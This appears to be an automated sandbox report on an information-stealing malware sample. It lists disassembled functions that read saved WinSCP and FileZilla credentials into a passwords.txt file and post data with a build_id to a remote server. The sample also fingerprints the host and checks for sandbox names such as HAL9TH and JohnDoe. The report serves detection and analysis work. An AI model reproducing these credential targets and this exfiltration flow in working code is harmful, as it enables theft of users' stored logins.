API ID: lstrcat$memset$Value$H_prolog$EnumHeapOpen$AllocCreateObjectProcessSingleThreadWaitlstrlen
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4023705341-1250616252
Opcode ID: c39dc6e039f8f81134bae3f85386a3e706bce3670fd253d2e2172a390f3ba86d
Instruction ID: 42636ee3264d0198b12f3c4f2769946958562b84b0d07412612f3ed8d39ca566
Opcode Fuzzy Hash: c39dc6e039f8f81134bae3f85386a3e706bce3670fd253d2e2172a390f3ba86d
Instruction Fuzzy Hash: 65C126B1D0011EAFDF01DBD1ED46EEFBB7DEB04349F10046AB501B2191D7789A588BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404360 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 771
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00404365

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

lstrlen.KERNEL32(00000000), ref: 004043D4

Part of subcall function 0040F82E: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F852
Part of subcall function 0040F82E: GetProcessHeap.KERNEL32(00000000,?,?,004043C8,?,?,?,?,?,?), ref: 0040F85F
Part of subcall function 0040F82E: HeapAlloc.KERNEL32(00000000,?,004043C8,?,?,?,?,?,?), ref: 0040F866

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

StrCmpCA.SHLWAPI(?,004239B7,004239B3,004239AB,004239A7,004239A6), ref: 00404457
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404477
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040459C
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004045D6
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004045FA

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00423A70,00000000,?,?,00000000), ref: 00404B0A
lstrlen.KERNEL32(00000000), ref: 00404B1C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B2E
HeapAlloc.KERNEL32(00000000), ref: 00404B35
lstrlen.KERNEL32(00000000), ref: 00404B47
memcpy.MSVCRT ref: 00404B5A
lstrlen.KERNEL32(00000000,?,?), ref: 00404B71
memcpy.MSVCRT ref: 00404B7B
lstrlen.KERNEL32(00000000), ref: 00404B8C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404BA5
memcpy.MSVCRT ref: 00404BB2
lstrlen.KERNEL32(00000000,?,00000000), ref: 00404BC7
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404BD8
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404BFF
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404C81
StrCmpCA.SHLWAPI(00000000,block), ref: 00404C99
ExitProcess.KERNEL32 ref: 00404CA4
InternetCloseHandle.WININET(?), ref: 00404CB4

Strings

", xrefs: 004046D3
", xrefs: 00404989
------, xrefs: 00404A05
ERROR, xrefs: 00404D83
ERROR, xrefs: 00404C0C
", xrefs: 00404822
0, xrefs: 00404C5F
file_data, xrefs: 00404AAD
------, xrefs: 004048B6
------, xrefs: 004044D0
", xrefs: 00404AD7
block, xrefs: 00404C8B
--, xrefs: 004044F7
------, xrefs: 00404600
------, xrefs: 00404750
build_id, xrefs: 004047F8

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
API String ID: 2658035217-3618031631
Opcode ID: 476ab2a1d45761da070b74ae7643efb6b3ad890e74c36cd9fde27e782e7ecd9a
Instruction ID: 6206ef52eafb39f864dc7eb2f23dd82a4f663a761a49c87c1cc0ae04d9a46c57
Opcode Fuzzy Hash: 476ab2a1d45761da070b74ae7643efb6b3ad890e74c36cd9fde27e782e7ecd9a
Instruction Fuzzy Hash: BE62667180014CEADB05EBE2C995ADEBBB8AF18308F14446EF501731C2EB786B59DB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3F4 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040B3F9

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808

strtok_s.MSVCRT ref: 0040B4D7
GetProcessHeap.KERNEL32(00000000,000F423F,00423C57,00423C56,00423C53,00423C52), ref: 0040B52B
HeapAlloc.KERNEL32(00000000), ref: 0040B532
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040B546
lstrlen.KERNEL32(00000000), ref: 0040B551
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040B589
lstrlen.KERNEL32(00000000), ref: 0040B594
StrStrA.SHLWAPI(00000000,<User>), ref: 0040B5D2
lstrlen.KERNEL32(00000000), ref: 0040B5DD
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040B61B
lstrlen.KERNEL32(00000000), ref: 0040B62A
lstrlen.KERNEL32(?), ref: 0040B825

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

memset.MSVCRT ref: 0040B878

Strings

passwords.txt, xrefs: 0040B837
<User>, xrefs: 0040B5CC
<Pass encoding="base64">, xrefs: 0040B615
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040B466
<Port>, xrefs: 0040B583
Login: , xrefs: 0040B769
Host: , xrefs: 0040B71B
<Host>, xrefs: 0040B540
Password: , xrefs: 0040B797
Soft: FileZilla, xrefs: 0040B70D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 486015307-935134978
Opcode ID: d734cb7e98ce5ff3dcd9777db4795c10a327c34f21a19f67334f3ad32ab2936a
Instruction ID: b166f65aba0722b069cc7c7f7918c4dbbdc0f5e6aabe4ab2eb970daa8bbeb78c
Opcode Fuzzy Hash: d734cb7e98ce5ff3dcd9777db4795c10a327c34f21a19f67334f3ad32ab2936a
Instruction Fuzzy Hash: 67E15271D00118AADB05FBE2DD46AEEBB78AF14304F54486EF401B21D2EB385B14CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00415AD9 Relevance: 68.4, APIs: 36, Strings: 3, Instructions: 146
sleeplibrarytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00415AE6
Sleep.KERNEL32(00000014), ref: 00415B1B
Sleep.KERNEL32(00000014), ref: 00415B22
Sleep.KERNEL32(00000014), ref: 00415B29
Sleep.KERNEL32(00000014), ref: 00415B30
Sleep.KERNEL32(00000014), ref: 00415B37
Sleep.KERNEL32(00000014), ref: 00415B3E
Sleep.KERNEL32(00000014), ref: 00415B4A
Sleep.KERNEL32(00000014), ref: 00415B51
Sleep.KERNEL32(00000014), ref: 00415B58
Sleep.KERNEL32(00000014), ref: 00415B5F
Sleep.KERNEL32(00000014), ref: 00415B6F
Sleep.KERNEL32(00000014), ref: 00415B76
GetSystemTime.KERNEL32(?), ref: 00415B80
Sleep.KERNEL32(00000014), ref: 00415B87
Sleep.KERNEL32(00000014), ref: 00415B8E
srand.MSVCRT ref: 00415B99
Sleep.KERNEL32(00000014), ref: 00415BA0
Sleep.KERNEL32(00000014), ref: 00415BA7
rand.MSVCRT ref: 00415BAD
Sleep.KERNEL32(00000014), ref: 00415BB3
Sleep.KERNEL32(00000014), ref: 00415BBA
Sleep.KERNEL32(00000014), ref: 00415BC6
Sleep.KERNEL32(00000014), ref: 00415BCD
Sleep.KERNEL32(00000014), ref: 00415BD4
Sleep.KERNEL32(00000014), ref: 00415BDB
Sleep.KERNEL32(00000014), ref: 00415BE2
Sleep.KERNEL32(00000014), ref: 00415BE9
Sleep.KERNEL32(00000014), ref: 00415BF0
Sleep.KERNEL32(00000014), ref: 00415BF7
CloseHandle.KERNEL32(00000000), ref: 00415C78
Sleep.KERNEL32(00001B58), ref: 00415C83
OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00424A48,?,00000000,004244C3), ref: 00415C94
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415CAA
CloseHandle.KERNEL32(00000000), ref: 00415CB8
ExitProcess.KERNEL32 ref: 00415CBF

Strings

kernel32.dll, xrefs: 00415AE1
GetSystemTime, xrefs: 00415AFF
Sleep, xrefs: 00415AF4

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$CloseEventHandle$CreateExitLibraryLoadOpenProcessSystemTimerandsrand
String ID: GetSystemTime$Sleep$kernel32.dll
API String ID: 1899683397-3444385320
Opcode ID: a20a1ddb1d470827b54f13a8b3a00c6c80afe7113cc5e40a79b8becaa9aec2c7
Instruction ID: 9fbc28225f14d69cee995eff129ba092aaa0e00c5b52ebe00b2e5197042d8efa
Opcode Fuzzy Hash: a20a1ddb1d470827b54f13a8b3a00c6c80afe7113cc5e40a79b8becaa9aec2c7
Instruction Fuzzy Hash: D841AD36501924AFCB017BB1ED4DDDEBF6BAE89715700242EF502B50A1DF3856428FEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405114 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 647
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00405119

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051C4
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405363
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040539A
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00423AF8,00000000), ref: 004057A9
lstrlen.KERNEL32(00000000), ref: 004057BA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057C4
HeapAlloc.KERNEL32(00000000), ref: 004057CB
lstrlen.KERNEL32(00000000), ref: 004057DC
memcpy.MSVCRT ref: 004057ED
lstrlen.KERNEL32(00000000), ref: 004057FE
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405817
memcpy.MSVCRT ref: 00405820
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405833
HttpSendRequestA.WININET(?,00000000,00000000), ref: 00405847
InternetReadFile.WININET(?,?,000000C7,?), ref: 0040589B
InternetCloseHandle.WININET(?), ref: 004058A6
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053BF

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

InternetCloseHandle.WININET(?), ref: 004058AF
InternetCloseHandle.WININET(?), ref: 004058B8
StrCmpCA.SHLWAPI(?), ref: 004051DB

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Strings

mode, xrefs: 00405723
", xrefs: 004055E7
", xrefs: 00405498
build_id, xrefs: 004055BD
------, xrefs: 004053C5
------, xrefs: 00405515
", xrefs: 0040574D
), xrefs: 004058FA
------, xrefs: 0040525D
------, xrefs: 0040567B

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$)$------$------$------$------$build_id$mode
API String ID: 2237346945-290892794
Opcode ID: c479e2d29b98b47438dbfd3a817438454e91a71a3f64224b7e2e4310f61ac810
Instruction ID: 00d0b6fd9aec665fcf80781b4ea6017fc21f92f67d473f1e1768996e30c26457
Opcode Fuzzy Hash: c479e2d29b98b47438dbfd3a817438454e91a71a3f64224b7e2e4310f61ac810
Instruction Fuzzy Hash: DB42347280014CEADB05EBE2D956AEEBBBCAF14308F14446EF501732C2DB781B59DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041313D Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1023
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00413142

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E6BE: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042444E), ref: 0040E6CC
Part of subcall function 0040E6BE: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6D3
Part of subcall function 0040E6BE: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6DF
Part of subcall function 0040E6BE: wsprintfA.USER32 ref: 0040E70A

Part of subcall function 0040EEF9: memset.MSVCRT ref: 0040EF1F
Part of subcall function 0040EEF9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NDB,?,?,00000000), ref: 0040EF3B
Part of subcall function 0040EEF9: RegQueryValueExA.KERNEL32(NDB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040EF5A
Part of subcall function 0040EEF9: CharToOemA.USER32(?,?), ref: 0040EF77

Part of subcall function 0040EF86: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97

Part of subcall function 0040EFC1: _EH_prolog.MSVCRT ref: 0040EFC6
Part of subcall function 0040EFC1: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
Part of subcall function 0040EFC1: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
Part of subcall function 0040EFC1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
Part of subcall function 0040EFC1: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004244F8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,004244EC,00000000), ref: 00413470

Part of subcall function 0040FA83: OpenProcess.KERNEL32(00000410,00000000,00413480), ref: 0040FA9B
Part of subcall function 0040FA83: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FAB6
Part of subcall function 0040FA83: CloseHandle.KERNEL32(00000000), ref: 0040FABD

Part of subcall function 0040F12F: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory), ref: 0040F143
Part of subcall function 0040F12F: HeapAlloc.KERNEL32(00000000,?,?,?,00413565,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F14A

Part of subcall function 0040F242: _EH_prolog.MSVCRT ref: 0040F247
Part of subcall function 0040F242: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F257
Part of subcall function 0040F242: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042451C), ref: 0040F268
Part of subcall function 0040F242: CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000), ref: 0040F282
Part of subcall function 0040F242: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042451C,00000000), ref: 0040F2B8
Part of subcall function 0040F242: VariantInit.OLEAUT32(?), ref: 0040F313

Part of subcall function 0040F3CB: _EH_prolog.MSVCRT ref: 0040F3D0
Part of subcall function 0040F3CB: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F3E0
Part of subcall function 0040F3CB: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F3F1
Part of subcall function 0040F3CB: CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F40B
Part of subcall function 0040F3CB: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F441
Part of subcall function 0040F3CB: VariantInit.OLEAUT32(?), ref: 0040F490

Part of subcall function 0040E683: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
Part of subcall function 0040E683: HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
Part of subcall function 0040E683: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA

Part of subcall function 0040E651: GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
Part of subcall function 0040E651: HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
Part of subcall function 0040E651: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678

Part of subcall function 0040EE84: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040EE99
Part of subcall function 0040EE84: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040EEA4
Part of subcall function 0040EE84: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040EEAF
Part of subcall function 0040EE84: ReleaseDC.USER32(00000000,00000000), ref: 0040EEBA
Part of subcall function 0040EE84: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?), ref: 0040EEC6
Part of subcall function 0040EE84: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,0041380E,?,00000000,?,Display Resolution: ,00000000,?,00424570,00000000,?,00000000), ref: 0040EECD
Part of subcall function 0040EE84: wsprintfA.USER32 ref: 0040EEDF

Part of subcall function 0040E76B: _EH_prolog.MSVCRT ref: 0040E770
Part of subcall function 0040E76B: GetKeyboardLayoutList.USER32(00000000,00000000,004241B7,00000000,?,00000000), ref: 0040E7A2
Part of subcall function 0040E76B: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040E7B0
Part of subcall function 0040E76B: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040E7BB
Part of subcall function 0040E76B: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040E7E5
Part of subcall function 0040E76B: LocalFree.KERNEL32(?), ref: 0040E889

Part of subcall function 0040E718: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ), ref: 0040E729
Part of subcall function 0040E718: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E730
Part of subcall function 0040E718: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E73F
Part of subcall function 0040E718: wsprintfA.USER32 ref: 0040E75D

Part of subcall function 0040E89E: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC), ref: 0040E8B2
